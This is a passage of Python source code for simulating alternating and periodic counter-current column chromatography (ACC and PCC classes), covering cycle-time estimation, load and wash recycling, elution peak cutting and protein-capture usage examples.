c_load - self.load_bt.calc_c_bound(f_load, c_load)
# Propagate breakthrough.
bt_load_out, _ = self._sim_c_recycle_propagation(
f_load,
bt_load,
None)
# 'Stop' load at specified breakthrough criteria.
# noinspection PyTypeChecker
i_cycle_duration = _utils.vectors.true_start(
bt_load_out.sum(0) >= load_c_end_ss.sum())
# Cut load at specified time.
bt_load = bt_load[:, :i_cycle_duration]
# Wash desorption.
if self.wash_desorption and self.wash_recycle:
c_first_wash_desorbed = self._sim_c_wash_desorption(
f_load[:i_cycle_duration],
c_load[:, :i_cycle_duration]
- bt_load[:, :i_cycle_duration])
else:
c_first_wash_desorbed = None
# Propagate load and wash leftovers.
bt_load_out, bt_wash_out = self._sim_c_recycle_propagation(
f_load[:i_cycle_duration],
bt_load,
c_first_wash_desorbed)
# Construct load for next cycle.
# Recycle load.
if self.load_recycle:
rec_load = bt_load_out[:,
i_prev_cycle:i_cycle_duration]
else:
rec_load = _np.zeros_like(
bt_load_out[:, i_prev_cycle:i_cycle_duration])
# Next load profiles.
c_next_load = _np.concatenate((rec_load,
c_load_fist_cycle),
axis=1)
f_next_load = self._load_f * _np.ones(c_next_load.shape[1])
wash_recycle_i_duration = self._wash_recycle_i_duration \
if self.wash_recycle else 0
# Log.
m_load_recycle_ss = \
bt_first_load_out[
:,
wash_recycle_i_duration:i_t_first_cycle
].sum() * self._load_f * self._dt
self._load_recycle_m_ss = m_load_recycle_ss
self.log.i_data(self._log_tree,
'm_load_recycle_ss',
m_load_recycle_ss)
# Recycle wash.
if self.wash_recycle:
c_next_load[:, :self._wash_recycle_i_duration] = \
bt_wash_out[:, :self._wash_recycle_i_duration]
f_next_load[:self._wash_recycle_i_duration] = \
self._wash_f
m_wash_recycle_ss = \
bt_wash_out[:,
:self._wash_recycle_i_duration
].sum() * self._wash_f * self._dt
self._wash_recycle_m_ss = m_wash_recycle_ss
self.log.i_data(self._log_tree,
'm_wash_recycle_ss',
m_wash_recycle_ss)
# Return next load and cycle duration.
return f_next_load, c_next_load, \
i_cycle_duration - i_prev_cycle
f_load_cycle = \
self._load_f * _np.ones(c_load_fist_cycle.shape[1])
c_load_cycle = c_load_fist_cycle
i_t_cycle_prev = i_t_first_cycle
i_t_cycle_estimate = 0
# Loop until cycle duration converges.
for i in range(
self.load_c_end_estimate_with_iter_solver_max_iter):
if abs(i_t_cycle_prev - i_t_cycle_estimate) <= 1:
self.log.i_data(self._log_tree,
"t_cycle_optimization_loop_iter",
i)
break
i_t_cycle_prev = i_t_cycle_estimate
f_load_cycle, c_load_cycle, i_t_cycle_estimate = \
sim_cycle(f_load_cycle, c_load_cycle, i_t_cycle_prev)
# print([i, i_t_cycle_prev, i_t_cycle_estimate])
if abs(i_t_cycle_prev - i_t_cycle_estimate) > 1:
self.log.w("Cycle duration estimator did not converge.")
t_cycle = i_t_cycle_estimate * self._dt
elif self.load_c_end_estimate_with_iterative_solver:
self.log.i(f"No need to use iterative solver in case of"
f" no recycling of load and/or wash.")
self._cycle_t = t_cycle
self.log.i_data(self._log_tree, 'cycle_t', t_cycle)
# noinspection DuplicatedCode
def _calc_first_cycle_extension_t(self):
"""Calc extension of first load.
First load step might be extended for processes with load and/or
wash recycle in order to get faster into steady-state regime.
"""
if not self.load_recycle and not self.wash_recycle:
self.log.w(f"Estimation of first cycle extension requested"
f" on a process without load recycle.")
self._first_cycle_extension_t = 0
return
elif not self.load_extend_first_cycle:
self.log.w(f"Estimation of first cycle extension requested"
f" on a process without extended first cycle.")
self._first_cycle_extension_t = 0
return
elif self.load_extend_first_cycle_t > 0:
self._first_cycle_extension_t = self.load_extend_first_cycle_t
return
elif self.load_extend_first_cycle_cv >= 0:
assert self._cv > 0, "CV should be defined by now."
assert self._load_f > 0, "Load flow rate should be defined by now."
self._first_cycle_extension_t = \
self.load_extend_first_cycle_cv * self._cv / self._load_f
elif self.load_cv > 0:
raise NotImplementedError(
f"Estimation of first cycle extension is only supported"
f" if the cycle length is defined by breakthrough cutoff"
f" criteria. This is due to the fact that if all the"
f" breakthrough material gets recycles,"
f" there is no single steady-state.")
else:
binding_species = [i for i in range(self._n_species)
if i not in self.non_binding_species]
load_c_ss = self._estimate_steady_state_mean_c(binding_species)
# simulate first cycle at constant load concentration
f_first_load = self._load_f * _np.ones(self._t.size)
c_first_load = load_c_ss * _np.ones([len(binding_species),
self._t.size])
bt_first_load: _np.ndarray = \
load_c_ss - self.load_bt.calc_c_bound(f_first_load,
c_first_load)
# propagate breakthrough
bt_first_load_out, _ = \
self._sim_c_recycle_propagation(f_first_load,
bt_first_load,
None)
load_c_end_ss = self._get_load_bt_cycle_switch_criteria(load_c_ss)
# noinspection PyTypeChecker
i_t_first_cycle = _utils.vectors.true_start(
bt_first_load_out.sum(0) >= load_c_end_ss.sum())
dm = 0
if self.load_recycle:
assert hasattr(self, "_load_recycle_m_ss"), \
f"Function `_calc_cycle_t()` should already be called."
dm += self._load_recycle_m_ss
if self.wash_recycle:
assert hasattr(self, "_wash_recycle_m_ss"), \
f"Function `_calc_cycle_t()` should already be called."
dm += self._wash_recycle_m_ss
di = 0
if dm > 0:
m_ext_bt = _np.cumsum(
bt_first_load_out.sum(0)[i_t_first_cycle:]
) * self._load_f * self._dt
di += _utils.vectors.true_start(m_ext_bt >= dm)
self._first_cycle_extension_t = di * self._dt
def _calc_cycle_start_i_list(self):
"""Calculate load switch positions in form of time steps."""
assert self._cycle_t > 0, \
f"Cycle length must have been determined" \
f" (by `_calc_cycle_t()`) by now"
flow_i_start, flow_i_end = \
_utils.vectors.true_start_and_end(self._f > 0)
if self.load_extend_first_cycle:
assert self._first_cycle_extension_t >= 0, \
f"Prolong of first load cycle is set to `True`," \
f" but the length is undefined."
if self._first_cycle_extension_t == 0:
self.log.w(f"Prolong of first load cycle is set to `True`,"
f" but the length of the extension is 0.")
load_extend_first_cycle_t = self._first_cycle_extension_t
self.log.i_data(self._log_tree,
"load_extend_first_cycle_t",
load_extend_first_cycle_t)
else:
load_extend_first_cycle_t = 0
cycle_start_t_list = _np.arange(
self._t[flow_i_start] + load_extend_first_cycle_t,
self._t[flow_i_end - 1],
self._cycle_t
)
cycle_start_t_list[0] = self._t[flow_i_start]
self._cycle_start_i_list = _np.rint(
cycle_start_t_list / self._dt).astype(_np.int32)
self.log.i_data(self._log_tree,
"cycle_start_t_list",
cycle_start_t_list)
def _prepare_simulation(self):
"""Prepare everything before cycle-by-cycle simulation."""
self._assert_non_binding_species()
self._calc_load_f()
self._calc_cv() # might depend on load_f
self._report_column_dimensions() # optional
# Equilibration.
self._calc_equilibration_t()
# Wash.
self._calc_wash_t_and_f()
# Elution.
self._calc_elution_t_and_f()
self._calc_elution_peak_t()
self._update_elution_peak_pdf()
self._calc_elution_peak_cut_i_start_and_i_end()
self._calc_elution_peak_mask()
# Regeneration.
self._calc_regeneration_t()
# Prepare for estimation of cycle length.
self._update_load_btc()
if self.load_recycle:
self._update_load_recycle_pdf(self._wash_f)
if self.wash_recycle:
self._calc_load_recycle_wash_i()
# Cycle time.
self._calc_cycle_t()
if self.load_extend_first_cycle:
self._calc_first_cycle_extension_t()
# Cycle start positions == column load switch time points.
self._calc_cycle_start_i_list()
# Make sure cycle duration is long enough.
_t_cycle_except_load = self._equilibration_t + self._wash_t \
+ self._elution_t + self._regeneration_t
if self._cycle_t < _t_cycle_except_load:
self.log.e(f"Load step ({self._cycle_t}) should not be shorter"
f" than eq_t + wash_t + elution_t + regeneration_t"
f" ({_t_cycle_except_load: .6})!")
def _sim_c_load_binding(self,
f_load: _np.ndarray,
c_load: _np.ndarray
) -> _typing.Tuple[_np.ndarray, _np.ndarray]:
"""Determine what part of load binds.
Load in this context might also contain wash and load recycle
from previous steps.
Parameters
----------
f_load
Load flow rate profile.
c_load
Load concentration profile.
Returns
-------
c_bound
Conc profile of bound material.
c_unbound
Conc profile of unbound material = `c_load` - `c_bound`.
"""
assert f_load.size == c_load.shape[1], \
"f_load and c_load must have the same length"
assert c_load.shape[0] == \
self._n_species - len(self.non_binding_species), \
"c_load must contain all binding species"
c_bound = self.load_bt.calc_c_bound(f_load, c_load)
# Returns bound and unbound part.
return c_bound, c_load - c_bound
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Get conc profile of desorbed material during wash step.
The step has no default logic.
Thus it raises `NotImplementedError` if called.
Parameters
----------
f_load
Flow rate profile during 'effective load' step.
The step includes wash recycle, load recycle and load step
as a column sees it in a single cycle.
c_bound
Conc profile of captured material.
Returns
-------
ndarray
Conc profile of desorbed material during wash step.
Raises
------
NotImplementedError
This method has no default implementation. Thus it being
called it will raise the error.
"""
        # Not implemented in this core class, as there is
# no consensus on typical dynamics and the way to describe it.
raise NotImplementedError("Function not implemented in this class")
def _sim_c_recycle_propagation(
self,
f_unbound: _np.ndarray,
c_unbound: _np.ndarray,
c_wash_desorbed: _typing.Optional[_np.ndarray]
) -> _typing.Tuple[_np.ndarray, _np.ndarray]:
"""Propagate unbound and desorbed material through the column.
Unbound (breakthrough during load) and desorbed (during wash)
sections might have a different flow rates as they come from
different steps - load and wash.
Parameters
----------
f_unbound
Flow rate profile during 'total load' step for a cycle.
The step includes wash recycle, load recycle and load step.
c_unbound
Conc profile of overloaded material during load step
(plus previous wash and load recycle).
c_wash_desorbed
Conc profile of desorbed material during wash step.
Returns
-------
c_unbound_propagated
Propagated conc profile of overloaded material.
c_wash_desorbed_propagated
Propagated conc profile of desorbed material.
"""
assert hasattr(self, "_wash_f") and self._wash_f > 0
assert hasattr(self, "_wash_t") and self._wash_t > 0
assert self.load_recycle_pdf is not None
assert c_unbound.shape[0] == \
self._n_species - len(self.non_binding_species)
assert c_unbound.shape[1] == f_unbound.size
if c_wash_desorbed is None or c_wash_desorbed.size == 0:
c_wash_desorbed = _np.zeros([
self._n_species - len(self.non_binding_species),
int(round(self._wash_t / self._dt))])
else:
assert c_wash_desorbed.shape[0] == \
self._n_species - len(self.non_binding_species)
assert c_wash_desorbed.shape[1] == \
int(round(self._wash_t / self._dt))
# Combine on volumetric scale.
v_load = self._dt * f_unbound.cumsum()
v_wash = v_load[-1] + \
self._dt * _np.arange(1, c_wash_desorbed.shape[1] + 1) \
* self._wash_f
min_flow = min(f_unbound.min(), self._wash_f)
dv = min_flow * self._dt
v = _np.arange(dv,
(v_wash[-1] if v_wash.size > 0 else v_load[-1]) + dv,
dv)
c_v_combined = _interp.interp1d(
_np.concatenate((v_load, v_wash), axis=0),
_np.concatenate((c_unbound, c_wash_desorbed), axis=1),
fill_value="extrapolate"
)(v)
c_v_combined[c_v_combined < 0] = 0
# Simulate traveling of leftover material through the column.
self._update_load_recycle_pdf(min_flow)
c_v_combined_propagated = _utils.convolution.time_conv(
self._dt, c_v_combined, self._p_load_recycle_pdf)
# Split back on time scale.
c_combined_propagated = _interp.interp1d(
v,
c_v_combined_propagated,
fill_value="extrapolate"
)(_np.concatenate((v_load, v_wash), axis=0))
c_combined_propagated[c_combined_propagated < 0] = 0
c_unbound_propagated = c_combined_propagated[:, :v_load.size]
c_wash_desorbed_propagated = c_combined_propagated[:, v_load.size:]
return c_unbound_propagated, c_wash_desorbed_propagated
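    # Implementation note: the load and wash sections are concatenated on a
    # volumetric axis (rather than a time axis) because the two steps may
    # run at different flow rates; the combined profile is convolved with
    # `load_recycle_pdf` on that axis and then interpolated back onto the
    # original time grids of the load and wash steps.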
def _sim_c_elution_desorption(self,
m_bound: _np.ndarray
) -> _typing.Tuple[_np.ndarray,
_np.ndarray]:
"""Simulate elution step.
Parameters
----------
m_bound
Vector with amount of product being bound to the column.
`m_bound.size == n_species`
Returns
-------
c_elution
Outlet concentration profile during the elution.
b_elution_peak
Boolean vector. Peak is collected where the value is `True`.
"""
assert self._elution_f > 0
assert self._elution_t > 0
i_elution_duration = int(round(self._elution_t / self._dt))
# Multiply elution peak with the amount of captured product.
c_elution = \
self._p_elution_peak[_np.newaxis, :i_elution_duration] * \
m_bound[:, _np.newaxis] / self._elution_f
# Pad with zeros to cover the entire elution step duration.
if c_elution.shape[1] < i_elution_duration:
c_elution = _np.pad(c_elution,
((0, 0),
(0, i_elution_duration - c_elution.shape[1])),
mode="constant")
# Boolean mask - `True` where peak is being collected.
b_elution_peak = self._elution_peak_mask
return c_elution, b_elution_peak
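    # Mass-balance note: `_p_elution_peak` integrates to approximately
    # (1 - `unaccounted_losses_rel`), so integrating the returned profile,
    # i.e. `(c_elution * self._elution_f * self._dt).sum(1)`, recovers about
    # `m_bound * (1 - unaccounted_losses_rel)` per specie (provided the peak
    # fits within the elution step); the boolean mask then selects the
    # collected part.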
def _sim_c_elution_buffer(self, n_time_steps: int) -> _np.ndarray:
"""Get elution buffer composition at the outlet of the column.
By default the buffer composition is constant throughout the
elution step.
Feel free to override this function if you want to simulate
linear gradient or if the transient phenomena at the beginning
of peak cut needs to be considered.
Parameters
----------
n_time_steps
Duration of elution step in number of time steps.
Returns
-------
ndarray
Buffer concentration profile at the outlet of the column
during the elution step.
"""
# Elution buffer composition.
elution_buffer_composition = \
self.elution_buffer_c.reshape(self.elution_buffer_c.size, 1)
assert elution_buffer_composition.size == 0 \
or elution_buffer_composition.size == self._n_species, \
f"Elution buffer composition must be either empty or have" \
f" a concentration value for each specie."
assert _np.all(elution_buffer_composition >= 0), \
"Concentration values in elution buffer must be >= 0"
if elution_buffer_composition.size == 0:
elution_buffer_composition = _np.zeros([self._n_species, 1])
self.log.i_data(self._log_tree,
"elution_buffer_composition",
elution_buffer_composition)
# Constant profile.
c_elution_buffer = elution_buffer_composition \
* _np.ones_like(self._t[:n_time_steps])
return c_elution_buffer
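    # A minimal sketch (illustrative only) of how a subclass might override
    # `_sim_c_elution_buffer` to model a linear buffer gradient; `c_start`
    # and `c_end` are hypothetical attributes, not part of this class:
    #
    #     def _sim_c_elution_buffer(self, n_time_steps: int) -> _np.ndarray:
    #         ramp = _np.linspace(0, 1, n_time_steps)[_np.newaxis, :]
    #         return self.c_start[:, _np.newaxis] * (1 - ramp) \
    #             + self.c_end[:, _np.newaxis] * ramp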
# noinspection PyMethodMayBeStatic,PyUnusedLocal
def _sim_c_regeneration(self,
m_bound: _np.ndarray
) -> _typing.Optional[_np.ndarray]:
"""Simulate regeneration step.
Parameters
----------
m_bound
Vector with amount of product being bound to the column at
the beginning of the regeneration step.
`m_bound.size == n_species`.
Returns
-------
Optional[ndarray]
Outlet concentration profile during regeneration step.
E.g. regeneration peak.
"""
# No default implementation.
c_regeneration = None
return c_regeneration
def _sim_c_out_cycle(self,
f_load: _np.ndarray,
c_load: _np.ndarray
) -> _typing.Tuple[_typing.Optional[_np.ndarray],
_typing.Optional[_np.ndarray],
_np.ndarray,
_np.ndarray,
_typing.Optional[_np.ndarray]]:
"""Simulates load-wash-elution-regeneration steps.
Regeneration is optional.
This function can be replaced in case user wants to use some
other variation of bind-elution dynamics.
Elution peak cut is applied in this function.
Elution peak shape must be defined by now.
Return profiles that are `None` are considered being zero.
Parameters
----------
f_load
Inlet (recycle + load) flow rate profile for a cycle.
The flow rate might be different during wash recycle.
c_load
Inlet (recycle + load) concentration profile.
Returns
-------
c_load
Conc profile at the outlet of the column during load.
c_wash
Conc profile at the outlet of the column during wash.
c_elution
Conc profile at the outlet of the column during elution.
b_elution
Boolean mask for elution step. `True` where peak is being
collected.
c_regeneration
Conc profile at the outlet of the column during
regeneration.
"""
assert self._load_f > 0
assert self._wash_f > 0
assert self._wash_t > 0
assert self._elution_f > 0
assert self._elution_t > 0
assert self._cv > 0
# Evaluate binding.
c_bound, c_unbound = self._sim_c_load_binding(f_load, c_load)
# Log.
m_load = (c_load * f_load[_np.newaxis, :]).sum(1) * self._dt
m_bound = (c_bound * f_load[_np.newaxis, :]).sum(1) * self._dt
self.log.i_data(self._cycle_tree,
"column_utilization",
m_bound / self._cv / self.load_bt.get_total_bc())
self.log.i_data(self._cycle_tree, "m_load", m_load)
self.log.i_data(self._cycle_tree, "m_bound", m_bound)
self.log.i_data(self._cycle_tree, "m_unbound", m_load - m_bound)
self.log.d_data(self._cycle_tree, "f_load", f_load)
self.log.d_data(self._cycle_tree, "c_load", c_load)
self.log.d_data(self._cycle_tree, "c_bound", c_bound)
self.log.d_data(self._cycle_tree, "c_unbound", c_unbound)
# Evaluate desorption during wash.
c_wash_desorbed = None
if self.wash_desorption:
c_wash_desorbed = self._sim_c_wash_desorption(f_load, c_bound)
if c_wash_desorbed.size > 0:
# Subtract desorbed material from bound material.
m_bound -= c_wash_desorbed.sum(1)
# Log.
self.log.i_data(self._cycle_tree,
"m_wash_desorbed",
c_wash_desorbed.sum(1) * self._wash_f * self._dt)
self.log.d_data(self._cycle_tree,
"c_wash_desorbed",
c_wash_desorbed)
# Propagate unbound and desorbed material throughout the column.
c_out_load = c_unbound
c_out_wash = c_wash_desorbed
if self.load_recycle or self.wash_recycle:
c_out_load, c_out_wash = \
self._sim_c_recycle_propagation(f_load,
c_unbound,
c_wash_desorbed)
# Get elution peak.
c_out_elution, elution_peak_mask = \
self._sim_c_elution_desorption(m_bound)
# Log.
m_elution_peak = (c_out_elution * elution_peak_mask[_np.newaxis, :]
).sum(1) * self._elution_f * self._dt
m_elution = c_out_elution.sum(1) * self._elution_f * self._dt
self.log.i_data(self._cycle_tree,
"m_elution_peak", m_elution_peak)
self.log.i_data(self._cycle_tree,
"m_elution", m_elution)
self.log.i_data(self._cycle_tree,
"m_elution_peak_cut_loss", m_elution - m_elution_peak)
# Get regeneration peak.
c_out_regeneration = self._sim_c_regeneration(
m_bound - c_out_elution.sum(1) * self._elution_f * self._dt)
return c_out_load, c_out_wash, c_out_elution, \
elution_peak_mask, c_out_regeneration
def _calculate(self):
# Pre calculate parameters and repetitive profiles.
self._prepare_simulation()
# Assert proper list of binding species.
binding_species = [i for i in range(self._n_species)
if i not in self.non_binding_species]
assert len(binding_species) > 0
# Copy inlet vectors.
c_in_load = self._c[binding_species].copy()
f_in_load = self._f.copy()
f_in_i_end = min(_utils.vectors.true_end(f_in_load > 0), self._t.size)
c_in_load[:, f_in_i_end:] = 0
# Clear for results.
self._c[:] = 0
self._f[:] = 0
# Prepare logger.
log_data_cycles = list()
self.log.set_branch(self._log_tree, "cycles", log_data_cycles)
# Variable to store wash recycle to.
previous_c_bt_wash: _typing.Optional[_np.ndarray] = None
# Loop across cycles.
for i in range(self._cycle_start_i_list.size):
# Load-wash-elution-regeneration-equilibration steps for a column.
# Load step starts at `self._cycle_start_i_list[i]`.
# Prepare logger for this cycle.
self._cycle_tree = dict()
log_data_cycles.append(self._cycle_tree)
# Load start and end time as the column sees it.
if i > 0 and self.load_recycle:
# Column sees leftovers from previous load during recycling.
cycle_load_i_start = self._cycle_start_i_list[i - 1]
else:
cycle_load_i_start = self._cycle_start_i_list[i]
# Calc cycle end (either next cycle or end of simulation time).
if i + 1 < self._cycle_start_i_list.size:
cycle_load_i_end = self._cycle_start_i_list[i + 1]
else:
cycle_load_i_end = f_in_i_end - 1
# Log results.
self.log.i_data(self._cycle_tree,
"i_cycle_load_start",
cycle_load_i_start)
self.log.i_data(self._cycle_tree,
"i_cycle_load_step_start",
self._cycle_start_i_list[i])
self.log.i_data(self._cycle_tree,
"i_cycle_load_end",
cycle_load_i_end)
# Calc profiles at column outlet.
c_out_load, c_out_wash, c_out_elution, \
b_out_elution, c_out_regeneration = self._sim_c_out_cycle(
f_in_load[cycle_load_i_start:cycle_load_i_end],
c_in_load[:, cycle_load_i_start:cycle_load_i_end]
)
self.log.d_data(self._cycle_tree,
"c_out_load", c_out_load)
self.log.d_data(self._cycle_tree,
"c_out_wash", c_out_wash)
self.log.d_data(self._cycle_tree,
"c_out_elution", c_out_elution)
self.log.d_data(self._cycle_tree,
"b_out_elution", b_out_elution)
self.log.d_data(self._cycle_tree,
"c_out_regeneration", c_out_regeneration)
# Load recycle.
if self.load_recycle:
# Recycle load during the load step.
i_load_start_rel = self._cycle_start_i_list[i] \
- cycle_load_i_start
c_load_recycle = c_out_load[:, i_load_start_rel:]
c_in_load[:, self._cycle_start_i_list[i]:cycle_load_i_end] = \
c_load_recycle
self.log.i_data(self._cycle_tree, "m_load_recycle",
c_load_recycle.sum(1)
* self._load_f * self._dt)
self.log.d_data(self._cycle_tree, "c_load_recycle",
c_load_recycle)
# Losses during load == bt through 2nd column.
c_loss_bt_2nd_column = c_out_load[:, i_load_start_rel]
self.log.i_data(self._cycle_tree, "m_loss_bt_2nd_column",
c_loss_bt_2nd_column.sum()
* self._dt * self._load_f)
self.log.d_data(self._cycle_tree, "c_loss_bt_2nd_column",
c_loss_bt_2nd_column)
else:
# report losses during load
m_loss_load = c_out_load.sum() * self._dt * self._load_f
self.log.i_data(self._cycle_tree, "m_loss_load", m_loss_load)
# Wash recycle.
if self.wash_recycle:
if previous_c_bt_wash is not None \
and previous_c_bt_wash.size > 0:
# Clip wash recycle duration if needed.
i_wash_duration = min(
self._wash_recycle_i_duration,
self._t.size - self._cycle_start_i_list[i])
# Log losses due to discarding load bt during wash recycle.
s = c_in_load[
:,
self._cycle_start_i_list[i]:self._cycle_start_i_list[i]
+ i_wash_duration]
self.log.i_data(self._cycle_tree,
"m_loss_load_bt_during_wash_recycle",
s.sum() * self._dt * self._load_f)
self.log.d_data(self._cycle_tree,
"c_lost_load_during_wash_recycle", s)
self.log.d_data(self._cycle_tree, "c_wash_recycle",
previous_c_bt_wash[:, :i_wash_duration])
self.log.i_data(
self._cycle_tree, "m_wash_recycle",
previous_c_bt_wash[:, :i_wash_duration].sum(1)
* self._dt * self._wash_f)
# Apply previous wash recycle onto the inlet profile.
s[:] = previous_c_bt_wash[:, :i_wash_duration]
f_in_load[self._cycle_start_i_list[i]:
self._cycle_start_i_list[i]
+ i_wash_duration] = self._wash_f
# Save wash from this cycle to be used during the next cycle.
previous_c_bt_wash = c_out_wash
else:
# Report losses during wash.
if c_out_wash is None:
c_out_wash = _np.zeros(
[len(binding_species),
int(round(self._wash_t / self._dt))])
m_loss_wash = c_out_wash.sum() * self._dt * self._load_f
self.log.i_data(self._cycle_tree, "m_loss_wash", m_loss_wash)
# Elution.
[i_el_rel_start, i_el_rel_end] = \
_utils.vectors.true_start_and_end(b_out_elution)
i_el_start = min(
self._t.size,
cycle_load_i_end + c_out_wash.shape[1] + i_el_rel_start)
i_el_end = min(
self._t.size,
cycle_load_i_end + c_out_wash.shape[1] + i_el_rel_end)
i_el_rel_end = i_el_rel_start + i_el_end - i_el_start
# Log.
self.log.i_data(self._cycle_tree, "i_elution_start", i_el_start)
self.log.i_data(self._cycle_tree, "i_elution_end", i_el_end)
# Write to global outlet.
self._f[i_el_start:i_el_end] = self._elution_f
self._c[binding_species, i_el_start:i_el_end] = \
c_out_elution[:, i_el_rel_start:i_el_rel_end]
class ACC(AlternatingChromatography):
"""Alternating column chromatography without recycling.
Alternating load-bind-elution twin-column chromatography without
recycling of overloaded or washed out material.
This class offers no dynamics for desorption during wash step.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "ACC".
Notes
-----
For list of attributes refer to :class:`AlternatingChromatography`.
See Also
--------
:class:`AlternatingChromatography`
Examples
--------
>>> dt = 0.5 # min
>>> t = _np.arange(0, 24.1 * 60, dt)
>>> load_bt = _bt_load.ConstantPatternSolution(dt, dbc_100=50, k=0.12)
>>> peak_shape_pdf = _pdf.ExpModGaussianFixedRelativeWidth(t, 0.15, 0.3)
>>> acc_pro_a = ACC(
... t,
... load_bt=load_bt,
... peak_shape_pdf=peak_shape_pdf,
... uo_id="pro_a_acc",
... gui_title="ProteinA ACC",
... )
>>> acc_pro_a.cv = 100 # mL
>>> # Equilibration step.
>>> acc_pro_a.equilibration_cv = 1.5
>>> # Equilibration flow rate is same as load flow rate.
>>> acc_pro_a.equilibration_f_rel = 1
>>> # Load 20 CVs.
>>> acc_pro_a.load_cv = 20
>>> # Define wash step.
>>> acc_pro_a.wash_cv = 5
>>> # Elution step.
>>> acc_pro_a.elution_cv = 3
>>> # 1st moment of the elution peak, from the data above.
>>> acc_pro_a.elution_peak_position_cv = 1.2
>>> acc_pro_a.elution_peak_cut_start_c_rel_to_peak_max = 0.05
>>> acc_pro_a.elution_peak_cut_end_c_rel_to_peak_max = 0.05
>>> # Regeneration step.
>>> acc_pro_a.regeneration_cv = 1.5
>>> # Inlet flow rate profile.
>>> f_in = _np.ones_like(t) * 15 # mL/min
>>> c_in = _np.ones([1, t.size]) * 2.5 # mg/mL
>>> # Simulate ACC.
>>> f_out, c_out = acc_pro_a.evaluate(f_in, c_in)
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
peak_shape_pdf: _core.PDF,
gui_title: str = "ACC"):
super().__init__(t, uo_id, load_bt, peak_shape_pdf, gui_title)
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Desorbed material during wash step is not supported by ACC.
Raises
------
NotImplementedError
Raised when the function is called.
"""
raise NotImplementedError("Function not implemented in this class.")
class PCC(AlternatingChromatography):
"""Alternating column chromatography with recycling of load.
Alternating load-bind-elution twin-column chromatography with
optional recycling of overloaded or washed out material.
This class offers no dynamics for desorption during wash step.
PCC uses :attr:`load_bt` to determine what parts of the load (and
recycled material) bind to the column. The unbound (not captured)
part is propagated through the column by :attr:`load_recycle_pdf`.
Void volume for :attr:`load_recycle_pdf` is defined as
:attr:`column_porosity_retentate` * `column volume`.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
load_recycle_pdf
Propagation of load breakthrough and/or washed out material
through the column.
column_porosity_retentate
Porosity of the column for binding species (protein).
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "PCC".
Notes
-----
For list of additional attributes refer to
:class:`AlternatingChromatography`.
See Also
--------
:class:`AlternatingChromatography`
Examples
--------
>>> dt = 0.5 # min
>>> t = _np.arange(0, 24.1 * 60, dt)
>>> load_bt = _bt_load.ConstantPatternSolution(dt, dbc_100=50, k=0.12)
>>> peak_shape_pdf = _pdf.ExpModGaussianFixedRelativeWidth(t, 0.15, 0.3)
>>> load_recycle_pdf = _pdf.GaussianFixedDispersion(t, 2 * 2 / 30)
>>> pcc_pro_a = PCC(
... t,
... load_bt=load_bt,
... peak_shape_pdf=peak_shape_pdf,
... load_recycle_pdf=load_recycle_pdf,
... # Porosity of the column for protein.
... column_porosity_retentate=0.64,
... uo_id="pro_a_pcc",
... gui_title="ProteinA PCC",
... )
>>> pcc_pro_a.cv = 100 # mL
>>> # Equilibration step.
>>> pcc_pro_a.equilibration_cv = 1.5
>>> # Equilibration flow rate is same as load flow rate.
>>> pcc_pro_a.equilibration_f_rel = 1
>>> # Load until 70 % breakthrough.
>>> pcc_pro_a.load_c_end_relative_ss = 0.7
>>> # Automatically prolong the first cycle to reach steady-state faster.
>>> pcc_pro_a.load_extend_first_cycle = True
>>> # Define wash step.
>>> # There is no desorption during wash step in this example.
>>> pcc_pro_a.wash_cv = 5
>>> pcc_pro_a.wash_recycle = True
>>> pcc_pro_a.wash_recycle_duration_cv = 2
>>> # Elution step.
>>> pcc_pro_a.elution_cv = 3
>>> # 1st moment of the elution peak, from the data above.
>>> pcc_pro_a.elution_peak_position_cv = 1.2
>>> pcc_pro_a.elution_peak_cut_start_c_rel_to_peak_max = 0.05
>>> pcc_pro_a.elution_peak_cut_end_c_rel_to_peak_max = 0.05
>>> # Regeneration step.
>>> pcc_pro_a.regeneration_cv = 1.5
>>> # Inlet flow rate profile.
>>> f_in = _np.ones_like(t) * 15 # mL/min
>>> c_in = _np.ones([1, t.size]) * 2.5 # mg/mL
>>> # Simulate PCC.
>>> f_out, c_out = pcc_pro_a.evaluate(f_in, c_in) # doctest: +ELLIPSIS
pro_a_pcc: Steady-state concentration is being estimated ...
pro_a_pcc: Steady-state concentration is being estimated ...
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
load_recycle_pdf: _core.PDF,
column_porosity_retentate: float,
peak_shape_pdf: _core.PDF,
gui_title: str = "PCC"):
super().__init__(t, uo_id, load_bt, peak_shape_pdf, gui_title)
self.load_recycle = True
"""Recycle load breakthrough. Default = `True`."""
self.wash_recycle = False
"""Recycle wash. Default = False."""
self.column_porosity_retentate = column_porosity_retentate
"""Column porosity for binding species.
See Also
--------
:class:`PCC`
Examples
--------
`column_porosity_retentate` is a mean residence time of the
product (protein) traveling through the column during
non-binding conditions (in CVs).
"""
self.load_recycle_pdf = load_recycle_pdf
"""PDF of wash and/or unbound load traveling through the column.
See Also
--------
:class:`PCC`
"""
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Desorbed material during wash step is not supported by PCC.
Raises
------
NotImplementedError
Raised when the function is called.
"""
raise NotImplementedError("Function not implemented in this class.")
class PCCWithWashDesorption(PCC):
"""Alternating column chromatography with recycling of load.
Alternating load-bind-elution twin-column chromatography with
optional recycling of overloaded or washed out material.
The material desorption during wash step is defined by exponential
half life time
* :attr:`wash_desorption_tail_half_time_cv`
and the amount of desorbable material which is defined by
* :attr:`wash_desorption_desorbable_material_share` or
* :attr:`wash_desorption_desorbable_above_dbc`.
PCC uses :attr:`load_bt` to determine what parts of the load (and
recycled material) bind to the column.
The unbound (not captured) part and desorbed part are propagated
through the column by :attr:`load_recycle_pdf`.
Void volume for :attr:`load_recycle_pdf` is defined as
:attr:`column_porosity_retentate` * `column volume`.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
